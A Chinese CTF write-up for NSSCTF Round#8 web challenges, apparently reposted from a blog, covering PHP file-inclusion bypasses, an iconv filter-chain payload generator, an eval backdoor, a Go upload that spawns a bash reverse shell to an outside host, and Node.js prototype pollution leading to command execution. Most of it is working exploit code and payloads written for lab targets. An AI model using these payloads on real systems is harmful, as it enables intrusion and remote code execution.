NSSCTF Round#8 web专项赛
短信预约 -IT技能 免费直播动态提醒
文章目录
MyPage
Where is my page?
拿到题目就是这个样子
感觉就是文件包含
可以读取,可以用filter协议
但是index.php怎么尝试都没读取到,data和input等协议都被ban了
方法一: pearcmd.php
filter读取不到index.php,可以试试pearcmd.php的姿势写shell
index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/+/tmp/shell.php
利用文件包含漏洞包含这个文件即可
方法二:多级连接绕过
/proc/self/root/多级连接绕过 include_once
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/index.php?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/flag.php注意最后是proc/self/cwd/
index.php源码是
error_reporting(0);include 'flag.php';if(!isset($_GET['file'])) { header('Location:/index.php?file=');} else { $file = $_GET['file']; if (!preg_match('/\.\.|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) { include_once $file; } else { die('error.'); }}include_once 不能重复包含,然后上面已经有include 'flag.php' 包含了,所以读不到flag.php
至于不能正常读到index.php我比较迷惑,应该是执行这个文件其实已经算包含一遍了,也是include_once的问题,换成include就可以正常读。
/proc/self/root/多级连接绕过原理可参考此文
方法三: PHP Base64 Filter 宽松解析
我在写这题时候 用了这个方法,不过payload生成可能产生一点问题,复现倒是很顺
$base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"; $conversions = array( 'R' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2', 'B' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2', 'C' => 'convert.iconv.UTF8.CSISO2022KR', '8' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', '9' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB', 'f' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213', 's' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61', 'z' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS', 'U' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932', 'P' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213', 'V' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5', '0' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2', 'Y' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2', 'W' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2', 'd' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2', 'D' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2', '7' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2', '4' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2');$filters = "convert.base64-encode|";# make sure to get rid of any equal signs in both the string we just generated and the rest of the file$filters .= "convert.iconv.UTF8.UTF7|";foreach (str_split(strrev($base64_payload)) as $c) { $filters .= $conversions[$c] . "|"; $filters .= "convert.base64-decode|"; $filters .= "convert.base64-encode|"; $filters .= "convert.iconv.UTF8.UTF7|";}$filters .= "convert.base64-decode";$final_payload = "php://filter/{$filters}/resource=/etc/passwd";echo $final_payload;#var_dump(file_get_contents($final_payload));
MyDoor
一个普通的后门。
这题的初始页面与上题一模一样
不一样的是可以直接伪协议读取到index.php (没用include_once)
能filter伪协议读取到index.php的源码
error_reporting(0);if (isset($_GET['N_S.S'])) { eval($_GET['N_S.S']);}if(!isset($_GET['file'])) { header('Location:/index.php?file=');} else { $file = $_GET['file']; if (!preg_match('/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) { include $file; } else { die('error.'); }}可以利用eval执行命令
eval($_GET['N_S.S']);这个参数N_S.S还涉及到了php的非法传参问题
当PHP版本小于8时,如果参数中出现中括号[,中括号会被转换成下划线_,但是会出现转换错误导致接下来如果该参数名中还有非法字符并不会继续转换成下划线_,也就是说如果中括号[出现在前面,那么中括号[还是会被转换成下划线_,但是因为出错导致接下来的非法字符并不会被转换成下划线_
那么就可以用N[S.S 传参
flag找了挺久,在环境变量env里面
Upload_gogoggo
没有任何过滤的文件上传!
是一个golang的文件上传 类似于[2022DASCTF MAY 挑战赛] hackme 没有复现吃亏了
之前也没接触很少go的题目
这里上传了个pass.png 可以看到它System output : go pass: unknown command
执行了 go pass的命令
可以上传一个golang命令执行的文件 run.go ,这样就会执行 go run的命令
package mainimport ("fmt""log""os/exec")func main() {cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/vps/ip 0>&1")out, err := cmd.CombinedOutput()if err != nil {fmt.Printf("combined out:\n%s\n", string(out))log.Fatalf("cmd.Run() failed with %s\n", err)}fmt.Printf("combined out:\n%s\n", string(out))}
flag是藏在home下
ez_node
const express = require("express");const path = require("path");const fs = require("fs");const multer = require("multer");const PORT = process.env.port || 3000const app = express();global = "global"app.listen(PORT, () => { console.log(`listen at ${PORT}`);});function merge(target, source) { for (let key in source) { if (key in source && key in target) { merge(target[key], source[key]) } else { target[key] = source[key] } }}let objMulter = multer({ dest: "./upload" });app.use(objMulter.any());app.use(express.static("./public"));app.post("/upload", (req, res) => { try{ let oldName = req.files[0].path; let newName = req.files[0].path + path.parse(req.files[0].originalname).ext; fs.renameSync(oldName, newName); res.send({ err: 0, url: "./upload/" + req.files[0].filename + path.parse(req.files[0].originalname).ext }); } catch(error){ res.send(require('./err.js').getRandomErr()) }});app.post('/pollution', require('body-parser').json(), (req, res) => { let data = {}; try{ merge(data, req.body); res.send('Register successfully!tql') require('./err.js').getRandomErr() } catch(error){ res.send(require('./err.js').getRandomErr()) }})这题没看懂
http://gtg.ink/ez-node-NSSCTF-round-8/ 出题人的wp
https://blog.csdn.net/weixin_52585514/article/details/128985443 V2师傅的wp
此题类似BalsnCTF 2022 2linenodejs ,v2师傅就直接用这个题的exp打
预期解是
//上传部分obj={ getRandomErr:() => { return require('child_process').execSync('cat /flag') }}module.exports = obj//污染部分{"constructor":{ "prototype":{ "data":{ "exports":{ ".":"./16285e8a41e03031c3638c8991393bc8.js" }, "name":"./err.js" }, "path":"./upload" } }}来源地址:https://blog.csdn.net/qq_61768489/article/details/129016075
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
